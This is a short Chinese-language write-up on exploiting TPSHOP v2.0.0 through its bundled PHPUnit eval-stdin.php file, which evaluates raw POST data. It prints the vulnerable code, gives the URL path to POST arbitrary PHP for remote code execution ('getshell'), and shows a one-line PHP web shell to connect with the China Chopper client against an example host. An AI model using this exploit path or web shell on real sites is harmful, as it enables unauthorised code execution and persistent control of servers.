本文作者:i春秋簽約作家——Laimooc
影響版本:TPSHOP v2.0.0
后門文件:eval-stdin.php 內容:
<?php eval('?>' . file_get_contents('php://input')); ?>
分析:
使用
file_get_contents('php://input'))
接收POST請求的原始數據流
eval函數來執行。
我們把代碼復制下來,本地調試如下,驚喜不,喜歡不,興奮不:
利用方法:
訪問后門文件 url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,post請求發送數據即可實現getshell。
那么問題來了,既然可以執行php代碼,那么我們就直接配置菜刀連接.
采用寫入的話就有點麻煩了。
地址:
http:xss.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
配置:
<O> <?php eval($_POST[c]);?> </O>
